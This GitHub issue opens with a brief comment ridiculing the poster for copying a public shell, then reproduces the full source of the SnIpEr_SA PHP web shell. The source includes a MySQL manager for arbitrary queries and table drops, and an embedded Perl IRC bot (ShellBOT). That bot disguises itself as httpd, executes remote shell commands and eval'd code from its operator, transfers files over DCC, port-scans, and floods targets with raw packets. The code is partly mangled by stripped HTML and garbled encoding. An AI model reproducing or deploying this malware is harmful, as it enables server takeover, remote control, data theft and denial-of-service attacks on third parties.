Open sniperbou3asba opened 8 years ago
So you skidded a public shell, (possibly) implementing very rudimentary unescape() obfuscation that won't even do what you want it to do. You do realize the second half of these functions are introduced to a cPanel or Plesk instance, they'll be deleted and alerted, right?
By the way, I was notified from the "@exec"
Also, why the hell is this in an issue? That makes absolutely no sense. Did you just decide to copy the content of "your" code into an issue to make it look cool? Pls respunderino :new_moon_with_face:
<?php
/**/
/
~~~~~~~~~~~~~~~~~~~~//* (c)oded by SnIpEr_SA
/* MAIL http://sniper-sa.com , http://sniper-sa.com
/**/
/*
~ ÇáÎíÇÑÇÊ | Options ~*/// ÇááÛÉ | Language
// $language='eng' - english (english)
// $language='ar' - arabi (arabi)
$language='ar';
// ?????????????? | Authentification
// $auth = 1; - áÊÝÚíá ÇáÏÎæá Èßáãå ÇáãÑæÑ ( authentification = On )
// $auth = 0; - áÇíÞÇÝ ÇáÏÎæá ÈßáãÉ ÇáãÑæÑ ( authentification = Off )
$auth = 0;
// áÏÎæá ÈßáãÉ ãÑæÑ æÇÓã ãÓÊÎÏã (Login & Password for access)
// áÍãÇíÉ ÇáÓßÑÈÊ ãä ÏÎæá ÛíÑß ÛíÑ ÇáÊÇáí!!! (CHANGE THIS!!!)
// åäÇ æÖÚß ßáãå ÇáãÑæÑ æåí ãÔÝÑå ÈÕíÛå md5, æßáãÉÚ ÇáãÑæÑ åäÇ åí 'sniper'
// ÊÓÊÚØíÚ Çä ÊÔÝÑ ßáãÉ ãÑæÑß æÇÓã ÇáãÓÊÎÏã ÈÕíÛÉ md5 ææÖÚåÇ Ýí ÇáÎÇäÇÊ ÇáÊÇáíå
$name='1c27680133b781cadd037e8a6dcc001b'; // ÇÓã ÇáãÓÊÎÏã (user login)
$pass='1c27680133b781cadd037e8a6dcc001b'; // ßáãÉ ÇáãÑæÑ (user password)
/**/
echo "".htmlspecialchars($copy)."";
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = '1.31';
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k=>$v)
{
$_COOKIE[$k] = stripslashes($v);
}
}
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
header('WWW-Authenticate: Basic realm="SnIpEr_SA shell"');
header('HTTP/1.0 401 Unauthorized');
exit("SnIpEr_SA : Access Denied");
}
}
$head = '
"; echo"The Host: $_SESSION[host], ÇÓã ÇáãÓÊÎÏã: $user Çæ Çáßáãå ÇáÓÑíå ÎØÇÁ.
"; echo"ÝÖáÇð ÓÌá ÎÑæÌ ááãÍÇæáå ãÑå ÇÎÑì.\n"; echo"
Please try again later.\n"; exit(); } } //********************************************************************* function exequery($sql, $tablename, $db){ $result= @mysql_query( $sql ); if($result){ //echo "Query successful"; return $result; }else{ echo"Sorry your Query failed: $sql
error:".mysql_error()."\n"; return false; } } //*************************************************** $fieldtypes = array("BIGINT", "BLOB", "CHAR", "DATE", "DATETIME", "DECIMAL", "DOUBLE", "ENUM", "FLOAT", "INT", "INTEGER", "LONGBLOB", "LONGTEXT", "MEDIUMBLOB", "MEDIUMINT", "MEDIUMTEXT", "NUMERIC", "PRECISION", "REAL","SET", "SMALLINT", "TEXT", "TIME", "TIMESTAMP", "TINYBLOB", "TINYINT", "TINYTEXT", "VARCHAR", "YEAR" ); //****************** Search Form **************************** function searchtableform($tablename, $dbname){ echo"\n"; } //********************* Search ************************* function searcht($tablename, $dbname, $searchval){ if(! empty($searchval)){ // $searchval= str_replace(";",' ', $searchval); $result=exequery("Select * from $tablename", $tablename, $dbname); //$result=mysql_query("Select * from $tablename"); $num = mysql_num_fields($result); $fields = mysql_list_fields($dbname, $tablename); $whr="where "; $tok=explode(" ",$searchval); for ($t =0; $t < count($tok); $t++){ for ( $c = 0; $c < $num; $c++){ $fn =mysql_field_name($fields, $c); $whr .=" $fn like '%$tok[$t]%' or "; } } $whr=trim(substr_replace($whr, " ", -3)); $query="Select * from $tablename $whr"; $result=exequery($query, $tablename, $dbname); return $result; } } //*********************GOTO buttons************************* //provides a form and button. function goto($tablename, $dbname, $action, $class, $name, $va ){ //Adds a button. echo"\n"; //echo"$va"; //} } //*********************** ShowDB *********************************** function showdb(){ //function showdb($backuppath){ $link=connectmysql(); if ($link){ echo"
ÅäÔÇÁ ÞÇÚÏÉ ÌÏíÏÉ
\n"; echo""; echo"
ÞÇÆãå ÇáÞæÇÚÏ ÇáãÊæÝÑå
\n"; //Restrict the database for users $dbnamearray= dbrestrict(); showdbs($dbnamearray); echo"Post: "; foreach($_POST as $pram=>$value){ echo"$pram: $value, "; } echo"
Session: "; foreach($_SESSION as $pram=>$value){ echo"$pram: $value, "; } } echo"\n"; echo"\n"; echo"\n"; echo"
ÓßÑÈÊ ÇáÇÊÕÇá ÈÞæÇÚÏ ÇáÈíÇäÇÊ
\n"; //******************* Session Logon *********************** if(isset($_POST['logout'])){ $_POST['dbname']=""; session_unset(); session_destroy(); } if(isset($_POST['userid']) && isset($_POST['pword1'])){ $_SESSION['user'] = $_POST['userid']; $_SESSION['password'] = $_POST['pword1']; } if (!isset($_SESSION['user']) || !isset($_SESSION['password'])){ echo"ÇÏÎá ÈíÇäÇÊ ÇáÓíÑÝÑ ÇáãÎÊÑÞ
\n"; If(!isset($dbnamearray)){ $dbnamearray=""; } show_login($dbnamearray); echo"ÞÇÚÏÉ ÌÏíÏÉ $_SESSION[dbname]
\n"; } } } //********************************************* if (! isset($_SESSION['dbname']) && ! isset($dbnamearray) && ! isset($_POST['dbname']) && isset($_SESSION['user'])){ //*********post //Databse names showdb(); } //************************ Choose DB ************* if(isset($_POST['dbname']) && $_POST['dbname']==""){ showdb(); } //********** if (isset($_SESSION['dbname']) || isset($_POST['dbna']) || isset($_POST['dbname'])){ //************************************* //connection if (isset($_SESSION['dbname'])){ $dbsetname = $_SESSION['dbname']; }elseif(isset($_POST['dbname'])){ $dbsetname = $_POST['dbname']; $_SESSION['dbname'] = $_POST['dbname']; }else{ $dbsetname = $_POST['dbna']; $_SESSION['dbname'] = $_POST['dbna']; } } //*************************** we have a DB set if(isset($dbsetname) && $dbsetname!=""){ $link= connectmysql(); //echo"DBS: $dbsetname"; $conn = connectdb($dbsetname, $link); //*********** Drop Table ************** if(isset($_POST['deltable'])){ $showall=false; $tablename=$_POST['tablename']; echo"!!! ÊÍÐíÑ !!!
\n"; $va="Drop $tablename"; goto($tablename, $dbname,$action, 'del', 'droptab', $va ); } if(isset($_POST['droptab'])){ $tablename=$_POST['tablename']; $dsql = "drop table $tablename"; $result=exequery($dsql, $tablename, $dbname); unset($tablename); //="false"; unset($_POST['tablename']); } //*****************Write Your Own Query ***************** if(isset($_POST['wyoq'])){ //post $value="ÇáæÇÌåå ÇáÑÆíÓíå ááÓßÑÈÊ"; goto($tablename, $dbname, $action, 'but', 'start', $value ); echo"ÇäÊ ÊÍÇæá ãÓÍ åÐÇ ÇáÌÏæá $tablename
"; echo"åá ÇäÊ ãÊÇßÏ ãä ÇáÞíÇã ÈÇáÚãáíå¿?
\n"; } if(isset($_POST['runquery'])){ $wyoqta = StripSlashes($_POST['wyoqta']); $result=exequery($wyoqta, " ", " "); if(@mysql_num_rows($result) >0){ $numrows=mysql_num_rows($result); $flds=mysql_num_fields($result); echo"
"; echo"
\n"; //************************************************** if(isset($_POST['addrec'])){ // $showall=false; $result=addrecord($tablename, $_SESSION['dbname'], $_POST['array']); }elseif(isset($_POST['add'])){ $showall=false; addform($tablename, $_SESSION['dbname']); }elseif(isset($_POST['delete'])){ //delete record has been pushed // $showall=false; $whr=buildwhr($_POST['pk'], $_POST['pv']); $sql = "delete from $tablename where $whr"; $result=exequery($sql, $tablename, $_SESSION['dbname']); }elseif (isset($_POST['edit'])){//Edit $showall=false; $whr = buildwhr( $_POST['pk'], $_POST['pv']); //$tablename = $_SESSION['tablename']; $sql= "Select * from $tablename where $whr"; $result=exequery($sql, $tablename, $_SESSION['dbname']); editform($tablename, $_SESSION['dbname'], $result, 'edit', $_POST['pk'], $_POST['pv']); }elseif(isset($_POST['editrec'])){ // $showall=false; $result=editrec($_SESSION['dbname'],$tablename, $_POST['pk'], $_POST['pv'], $_POST['array']); } //**************** Search ************************************ if(isset($_POST['searchval'])){ $searchval=$_POST['searchval']; }elseif(isset($_GET['searchval'])){ $searchval=$_GET['searchval']; }else{ $searchval=""; } if (isset($_GET['tablename'])){ $tablename = $_GET['tablename']; } if((isset($_POST['search'])|| isset($searchval)) && $searchval !=""){ $result=searcht($tablename, $_SESSION['dbname'], $searchval); }else{ //Display All $query = "select * from $tablename"; $result=exequery($query, $tablename, $_SESSION['dbname']); } //***************** Display record count ***************************************** if($showall){ $num_rows = mysql_num_rows($result); //Workout whick page to display if(!isset($_GET['pg']) && !isset($pg)){ $beg=0; $pg=0; }else{ if(isset($_GET['pback'])){ $pg=$_GET['pg']; }else{ $pg=$_GET['pg']; } if($pg < 0 ){ $pg=0; } if($pg > $num_rows/$pagemax){ $pg=ceil($num_rows/$pagemax)-1; } $beg = $pg * $pagemax; } if (!isset($_POST['add'])){ $pscrol=" "; $pagescrol =" "; $pagescrol = whichpage($num_rows, $pagemax, $pg, $tablename, $searchval); echo "$pagescrol\n"; //Display next Top page menu $flds = mysql_num_fields($result); echo"
"; echo "$pagescrol\n"; //Display bottom next page menu } echo"
\n"; }//showall if(isset($_POST['tablename'])){ echo"
"; switch($sql->query($query)) { case '0': echo "
"; break; } } } } } echo "
"; echo "
"; } echo '
".$lang[$language.'_text56']."
"; } echo "Dont Forget to Delete Loader.pl in /tmp
"; ####################################################### ######################IRC Trojan########################## $file=" ################ CONFIGURACAO ################################################################# my \$processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps # #----------------------------------------------################################################ my \$linas_max='48'; # Evita o flood :) depois de X linhas # #----------------------------------------------################################################ my \$sleep='4'; # ele dorme X segundos # ##################### IRC ##################################################################### my @adms=(\"$ircadmin\"); # Nick do administrador # #----------------------------------------------################################################ my @canais=(\"$ircchan\"); # Caso haja senha (\"#canal :senha\") # #----------------------------------------------################################################ my \$nick='$irclabel'; # Nick do bot. Caso esteja em uso vai aparecer # # aparecer com numero radonamico no final # #----------------------------------------------################################################ my \$ircname = 'Linux'; # User ID # #----------------------------------------------################################################ chop (my \$realname = `uname -a`); # Full Name # #----------------------------------------------################################################ \$servidor='$ircserver' unless \$servidor; # Servidor de irc que vai ser usado # # caso não seja especificado no argumento # #----------------------------------------------################################################ my \$porta='6667'; # Porta do servidor de irc # ################ ACESSO A SHELL ############################################################### my \$secv = 1; # 1/0 pra habilita/desabilita acesso a shell # ############################################################################################### my \$VERSAO = '0.2'; \$SIG{'INT'} = 'IGNORE'; \$SIG{'HUP'} = 'IGNORE'; \$SIG{'TERM'} = 'IGNORE'; \$SIG{'CHLD'} = 'IGNORE'; \$SIG{'PS'} = 'IGNORE'; \$SIG{'STOP'} = 'IGNORE'; use IO::Socket; use Socket; use IO::Select; chdir(\"/\"); \$servidor=\"\$ARGV[0]\" if \$ARGV[0]; $0=\"\$processo\".\"\0\"x16;; my \$pid=fork; exit if \$pid; die \"Problema com o fork: $!\" unless defined(\$pid); my \$dcc_sel = new IO::Select->new(); ############################# # B0tchZ na veia ehehe :P # ############################# \$sel_cliente = IO::Select->new(); sub sendraw { if ($#_ == '1') { my \$socket = \$_[0]; print \$socket \"\$_[1]\\n\"; } else { print \$IRC_cur_socket \"\$_[0]\\n\"; } } ################################# sub conectar { my \$meunick = \$_[0]; my \$servidor_con = \$_[1]; my \$porta_con = \$_[2]; my \$IRC_socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"\$servidor_con\", PeerPort=>\$porta_con) or return(1); if (defined(\$IRC_socket)) { \$IRC_cur_socket = \$IRC_socket; \$IRC_socket->autoflush(1); \$sel_cliente->add(\$IRC_socket); \$irc_servers{\$IRC_cur_socket}{'host'} = \"\$servidor_con\"; \$irc_servers{\$IRC_cur_socket}{'porta'} = \"\$porta_con\"; \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; \$irc_servers{\$IRC_cur_socket}{'meuip'} = \$IRC_socket->sockhost; nick(\"\$meunick\"); sendraw(\"USER \$ircname \".\$IRC_socket->sockhost.\" \$servidor_con :\$realname\"); sleep 1; } } ##################### my \$line_temp; while( 1 ) { while (!(keys(%irc_servers))) { conectar(\"\$nick\", \"\$servidor\", \"\$porta\"); } delete(\$irc_servers{''}) if (defined(\$irc_servers{''})); &DCC::connections; my @ready = \$sel_cliente->can_read(0); next unless(@ready); foreach \$fh (@ready) { \$IRC_cur_socket = \$fh; \$meunick = \$irc_servers{\$IRC_cur_socket}{'nick'}; \$nread = sysread(\$fh, \$msg, 4096); if (\$nread == 0) { \$sel_cliente->remove(\$fh); \$fh->close; delete(\$irc_servers{\$fh}); } @lines = split (/\\n/, \$msg); for(my \$c=0; \$c<= $#lines; \$c++) { \$line = \$lines[\$c]; \$line=\$line_temp.\$line if (\$line_temp); \$line_temp=''; \$line =~ s/\\r$//; unless (\$c == $#lines) { parse(\"\$line\"); } else { if ($#lines == 0) { parse(\"\$line\"); } elsif (\$lines[\$c] =~ /\\r$/) { parse(\"\$line\"); } elsif (\$line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse(\"\$line\"); } else { \$line_temp = \$line; } } } } } ######################### sub parse { my \$servarg = shift; if (\$servarg =~ /^PING \:(.*)/) { sendraw(\"PONG :$1\"); } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { my \$pn=$1; my \$onde = $4; my \$args = $5; if (\$args =~ /^\\001VERSION\\001$/) { notice(\"\$pn\", \"\\001VERSION ShellBOT-\$VERSAO por 0ldW0lf\\001\"); } if (grep {\$_ =~ /^\Q\$pn\E$/i } @adms) { if (\$onde eq \"\$meunick\"){ shell(\"\$pn\", \"\$args\"); } if (\$args =~ /^(\Q\$meunick\E|\!atrix)\s+(.*)/ ) { my \$natrix = $1; my \$arg = $2; if (\$arg =~ /^\!(.*)/) { ircase(\"\$pn\",\"\$onde\",\"\$1\") unless (\$natrix eq \"!atrix\" and \$arg =~ /^\!nick/); } elsif (\$arg =~ /^\@(.*)/) { \$ondep = \$onde; \$ondep = \$pn if \$onde eq \$meunick; bfunc(\"\$ondep\",\"$1\"); } else { shell(\"\$onde\", \"\$arg\"); } } } } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc(\$meunick)) { \$meunick=$4; \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; } } elsif (\$servarg =~ m/^\:(.+?)\s+433/i) { nick(\"\$meunick\".int rand(9999)); } elsif (\$servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { \$meunick = $2; \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; \$irc_servers{\$IRC_cur_socket}{'nome'} = \"$1\"; foreach my \$canal (@canais) { sendraw(\"JOIN \$canal\"); } } } ########################## sub bfunc { my \$printl = \$_[0]; my \$funcarg = \$_[1]; if (my \$pid = fork) { waitpid(\$pid, 0); } else { if (fork) { exit; } else { if (\$funcarg =~ /^portscan (.*)/) { my \$hostip=\"$1\"; my @portas=(\"21\",\"22\",\"23\",\"25\",\"53\",\"80\",\"110\",\"143\"); my (@aberta, %porta_banner); foreach my \$porta (@portas) { my \$scansock = IO::Socket::INET->new(PeerAddr => \$hostip, PeerPort => \$porta, Proto => 'tcp', Timeout => 4); if (\$scansock) { push (@aberta, \$porta); \$scansock->close; } } if (@aberta) { sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :portas abertas: @aberta\"); } else { sendraw(\$IRC_cur_socket,\"PRIVMSG \$printl :Nenhuma porta aberta foi encontrada\"); } } if (\$funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) { my (\$dtime, %pacotes) = attacker(\"$1\", \"$2\", \"$3\"); \$dtime = 1 if \$dtime == 0; my %bytes; \$bytes{igmp} = $2 * \$pacotes{igmp}; \$bytes{icmp} = $2 * \$pacotes{icmp}; \$bytes{o} = $2 * \$pacotes{o}; \$bytes{udp} = $2 * \$pacotes{udp}; \$bytes{tcp} = $2 * \$pacotes{tcp}; sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002 - Status GERAL -\\002\"); sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Tempo\\002: \$dtime\".\"s\"); sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total pacotes\\002: \".(\$pacotes{udp} + \$pacotes{igmp} + \$pacotes{icmp} + \$pacotes{o})); sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total bytes\\002: \".(\$bytes{icmp} + \$bytes {igmp} + \$bytes{udp} + \$bytes{o})); sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Média de envio\\002: \".int(((\$bytes{icmp}+\$bytes{igmp}+\$bytes{udp} + \$bytes{o})/1024)/\$dtime).\" kbps\"); } exit; } } } ########################## sub ircase { my (\$kem, \$printl, \$case) = @_; if (\$case =~ /^join (.*)/) { j(\"$1\"); } if (\$case =~ /^part (.*)/) { p(\"$1\"); } if (\$case =~ /^rejoin\s+(.*)/) { my \$chan = $1; if (\$chan =~ /^(\d+) (.*)/) { for (my \$ca = 1; \$ca <= $1; \$ca++ ) { p(\"$2\"); j(\"$2\"); } } else { p(\"\$chan\"); j(\"\$chan\"); } } if (\$case =~ /^op/) { op(\"\$printl\", \"\$kem\") if \$case eq \"op\"; my \$oarg = substr(\$case, 3); op(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); } if (\$case =~ /^deop/) { deop(\"\$printl\", \"\$kem\") if \$case eq \"deop\"; my \$oarg = substr(\$case, 5); deop(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); } if (\$case =~ /^voice/) { voice(\"\$printl\", \"\$kem\") if \$case eq \"voice\"; \$oarg = substr(\$case, 6); voice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); } if (\$case =~ /^devoice/) { devoice(\"\$printl\", \"\$kem\") if \$case eq \"devoice\"; \$oarg = substr(\$case, 8); devoice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); } if (\$case =~ /^msg\s+(\S+) (.*)/) { msg(\"$1\", \"$2\"); } if (\$case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { for (my \$cf = 1; \$cf <= $1; \$cf++) { msg(\"$2\", \"$3\"); } } if (\$case =~ /^ctcp\s+(\S+) (.*)/) { ctcp(\"$1\", \"$2\"); } if (\$case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { for (my \$cf = 1; \$cf <= $1; \$cf++) { ctcp(\"$2\", \"$3\"); } } if (\$case =~ /^invite\s+(\S+) (.*)/) { invite(\"$1\", \"$2\"); } if (\$case =~ /^nick (.*)/) { nick(\"$1\"); } if (\$case =~ /^conecta\s+(\S+)\s+(\S+)/) { conectar(\"$2\", \"$1\", 6667); } if (\$case =~ /^send\s+(\S+)\s+(\S+)/) { DCC::SEND(\"$1\", \"$2\"); } if (\$case =~ /^raw (.*)/) { sendraw(\"$1\"); } if (\$case =~ /^eval (.*)/) { eval \"$1\"; } } ########################## sub shell { return unless \$secv; my \$printl=\$_[0]; my \$comando=\$_[1]; if (\$comando =~ /cd (.*)/) { chdir(\"$1\") || msg(\"\$printl\", \"Dossier Makayench :D \"); return; } elsif (\$pid = fork) { waitpid(\$pid, 0); } else { if (fork) { exit; } else { my @resp=`\$comando 2>&1 3>&1`; my \$c=0; foreach my \$linha (@resp) { \$c++; chop \$linha; sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\$linha\"); if (\$c == \"\$linas_max\") { \$c=0; sleep \$sleep; } } exit; } } } #eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki sub attacker { my \$iaddr = inet_aton(\$_[0]); my \$msg = 'B' x \$_[1]; my \$ftime = \$_[2]; my \$cp = 0; my (%pacotes); \$pacotes{icmp} = \$pacotes{igmp} = \$pacotes{udp} = \$pacotes{o} = \$pacotes{tcp} = 0; socket(SOCK1, PF_INET, SOCK_RAW, 2) or \$cp++; socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or \$cp++; socket(SOCK3, PF_INET, SOCK_RAW, 1) or \$cp++; socket(SOCK4, PF_INET, SOCK_RAW, 6) or \$cp++; return(undef) if \$cp == 4; my \$itime = time; my (\$cur_time); while ( 1 ) { for (my \$porta = 1; \$porta <= 65535; \$porta++) { \$cur_time = time - \$itime; last if \$cur_time >= \$ftime; send(SOCK1, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{igmp}++; send(SOCK2, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{udp}++; send(SOCK3, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{icmp}++; send(SOCK4, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{tcp}++; # DoS ?? :P for (my \$pc = 3; \$pc <= 255;\$pc++) { next if \$pc == 6; \$cur_time = time - \$itime; last if \$cur_time >= \$ftime; socket(SOCK5, PF_INET, SOCK_RAW, \$pc) or next; send(SOCK5, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{o}++;; } } last if \$cur_time >= \$ftime; } return(\$cur_time, %pacotes); } ############# # ALIASES # ############# sub action { return unless $#_ == 1; sendraw(\"PRIVMSG \$_[0] :\\001ACTION \$_[1]\\001\"); } sub ctcp { return unless $#_ == 1; sendraw(\"PRIVMSG \$_[0] :\\001\$_[1]\\001\"); } sub msg { return unless $#_ == 1; sendraw(\"PRIVMSG \$_[0] :\$_[1]\"); } sub notice { return unless $#_ == 1; sendraw(\"NOTICE \$_[0] :\$_[1]\"); } sub op { return unless $#_ == 1; sendraw(\"MODE \$_[0] +o \$_[1]\"); } sub deop { return unless $#_ == 1; sendraw(\"MODE \$_[0] -o \$_[1]\"); } sub hop { return unless $#_ == 1; sendraw(\"MODE \$_[0] +h \$_[1]\"); } sub dehop { return unless $#_ == 1; sendraw(\"MODE \$_[0] +h \$_[1]\"); } sub voice { return unless $#_ == 1; sendraw(\"MODE \$_[0] +v \$_[1]\"); } sub devoice { return unless $#_ == 1; sendraw(\"MODE \$_[0] -v \$_[1]\"); } sub ban { return unless $#_ == 1; sendraw(\"MODE \$_[0] +b \$_[1]\"); } sub unban { return unless $#_ == 1; sendraw(\"MODE \$_[0] -b \$_[1]\"); } sub kick { return unless $#_ == 1; sendraw(\"KICK \$_[0] \$_[1] :\$_[2]\"); } sub modo { return unless $#_ == 0; sendraw(\"MODE \$_[0] \$_[1]\"); } sub mode { modo(@_); } sub j { &join(@_); } sub join { return unless $#_ == 0; sendraw(\"JOIN \$_[0]\"); } sub p { part(@_); } sub part {sendraw(\"PART \$_[0]\");} sub nick { return unless $#_ == 0; sendraw(\"NICK \$_[0]\"); } sub invite { return unless $#_ == 1; sendraw(\"INVITE \$_[1] \$_[0]\"); } sub topico { return unless $#_ == 1; sendraw(\"TOPIC \$_[0] \$_[1]\"); } sub topic { topico(@_); } sub whois { return unless $#_ == 0; sendraw(\"WHOIS \$_[0]\"); } sub who { return unless $#_ == 0; sendraw(\"WHO \$_[0]\"); } sub names { return unless $#_ == 0; sendraw(\"NAMES \$_[0]\"); } sub away { sendraw(\"AWAY \$_[0]\"); } sub back { away(); } sub quit { sendraw(\"QUIT :\$_[0]\"); } # DCC ######################### package DCC; sub connections { my @ready = \$dcc_sel->can_read(1); # return unless (@ready); foreach my \$fh (@ready) { my \$dcctipo = \$DCC{\$fh}{tipo}; my \$arquivo = \$DCC{\$fh}{arquivo}; my \$bytes = \$DCC{\$fh}{bytes}; my \$cur_byte = \$DCC{\$fh}{curbyte}; my \$nick = \$DCC{\$fh}{nick}; my \$msg; my \$nread = sysread(\$fh, \$msg, 10240); if (\$nread == 0 and \$dcctipo =~ /^(get|sendcon)$/) { \$DCC{\$fh}{status} = \"Cancelado\"; \$DCC{\$fh}{ftime} = time; \$dcc_sel->remove(\$fh); \$fh->close; next; } if (\$dcctipo eq \"get\") { \$DCC{\$fh}{curbyte} += length(\$msg); my \$cur_byte = \$DCC{\$fh}{curbyte}; open(FILE, \">> \$arquivo\"); print FILE \"\$msg\" if (\$cur_byte <= \$bytes); close(FILE); my \$packbyte = pack(\"N\", \$cur_byte); print \$fh \"\$packbyte\"; if (\$bytes == \$cur_byte) { \$dcc_sel->remove(\$fh); \$fh->close; \$DCC{\$fh}{status} = \"Recebido\"; \$DCC{\$fh}{ftime} = time; next; } } elsif (\$dcctipo eq \"send\") { my \$send = \$fh->accept; \$send->autoflush(1); \$dcc_sel->add(\$send); \$dcc_sel->remove(\$fh); \$DCC{\$send}{tipo} = 'sendcon'; \$DCC{\$send}{itime} = time; \$DCC{\$send}{nick} = \$nick; \$DCC{\$send}{bytes} = \$bytes; \$DCC{\$send}{curbyte} = 0; \$DCC{\$send}{arquivo} = \$arquivo; \$DCC{\$send}{ip} = \$send->peerhost; \$DCC{\$send}{porta} = \$send->peerport; \$DCC{\$send}{status} = \"Enviando\"; #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon open(FILE, \"< \$arquivo\"); my \$fbytes; read(FILE, \$fbytes, 1024); print \$send \"\$fbytes\"; close FILE; # delete(\$DCC{\$fh}); } elsif (\$dcctipo eq 'sendcon') { my \$bytes_sended = unpack(\"N\", \$msg); \$DCC{\$fh}{curbyte} = \$bytes_sended; if (\$bytes_sended == \$bytes) { \$fh->close; \$dcc_sel->remove(\$fh); \$DCC{\$fh}{status} = \"Enviado\"; \$DCC{\$fh}{ftime} = time; next; } open(SENDFILE, \"< \$arquivo\"); seek(SENDFILE, \$bytes_sended, 0); my \$send_bytes; read(SENDFILE, \$send_bytes, 1024); print \$fh \"\$send_bytes\"; close(SENDFILE); } } } ########################## sub SEND { my (\$nick, \$arquivo) = @_; unless (-r \"\$arquivo\") { return(0); } my \$dccark = \$arquivo; \$dccark =~ s/[.*\/](\S+)/$1/; my \$meuip = $::irc_servers{\"$::IRC_cur_socket\"}{'meuip'}; my \$longip = unpack(\"N\",inet_aton(\$meuip)); my @filestat = stat(\$arquivo); my \$size_total=\$filestat[7]; if (\$size_total == 0) { return(0); } my (\$porta, \$sendsock); do { \$porta = int rand(64511); \$porta += 1024; \$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>\$porta, Proto => 'tcp') and \$dcc_sel->add(\$sendsock); } until \$sendsock; \$DCC{\$sendsock}{tipo} = 'send'; \$DCC{\$sendsock}{nick} = \$nick; \$DCC{\$sendsock}{bytes} = \$size_total; \$DCC{\$sendsock}{arquivo} = \$arquivo; &::ctcp(\"\$nick\", \"DCC SEND \$dccark \$longip \$porta \$size_total\"); } sub GET { my (\$arquivo, \$dcclongip, \$dccporta, \$bytes, \$nick) = @_; return(0) if (-e \"\$arquivo\"); if (open(FILE, \"> \$arquivo\")) { close FILE; } else { return(0); } my \$dccip=fixaddr(\$dcclongip); return(0) if (\$dccporta < 1024 or not defined \$dccip or \$bytes < 1); my \$dccsock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\$dccip, PeerPort=>\$dccporta, Timeout=>15) or return (0); \$dccsock->autoflush(1); \$dcc_sel->add(\$dccsock); \$DCC{\$dccsock}{tipo} = 'get'; \$DCC{\$dccsock}{itime} = time; \$DCC{\$dccsock}{nick} = \$nick; \$DCC{\$dccsock}{bytes} = \$bytes; \$DCC{\$dccsock}{curbyte} = 0; \$DCC{\$dccsock}{arquivo} = \$arquivo; \$DCC{\$dccsock}{ip} = \$dccip; \$DCC{\$dccsock}{porta} = \$dccporta; \$DCC{\$dccsock}{status} = \"Recebendo\"; } ############################ # po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas sub Status { my \$socket = shift; my \$sock_tipo = \$DCC{\$socket}{tipo}; unless (lc(\$sock_tipo) eq \"chat\") { my \$nick = \$DCC{\$socket}{nick}; my \$arquivo = \$DCC{\$socket}{arquivo}; my \$itime = \$DCC{\$socket}{itime}; my \$ftime = time; my \$status = \$DCC{\$socket}{status}; \$ftime = \$DCC{\$socket}{ftime} if defined(\$DCC{\$socket}{ftime}); my \$d_time = \$ftime-\$itime; my \$cur_byte = \$DCC{\$socket}{curbyte}; my \$bytes_total = \$DCC{\$socket}{bytes}; my \$rate = 0; \$rate = (\$cur_byte/1024)/\$d_time if \$cur_byte > 0; my \$porcen = (\$cur_byte*100)/\$bytes_total; my (\$r_duv, \$p_duv); if (\$rate =~ /^(\d+)\.(\d)(\d)(\d)/) { \$r_duv = $3; \$r_duv++ if $4 >= 5; \$rate = \"$1\.$2\".\"\$r_duv\"; } if (\$porcen =~ /^(\d+)\.(\d)(\d)(\d)/) { \$p_duv = $3; \$p_duv++ if $4 >= 5; \$porcen = \"$1\.$2\".\"\$p_duv\"; } return(\"\$sock_tipo\",\"\$status\",\"\$nick\",\"\$arquivo\",\"\$bytes_total\", \"\$cur_byte\",\"\$d_time\", \"\$rate\", \"\$porcen\"); } return(0); } # esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico 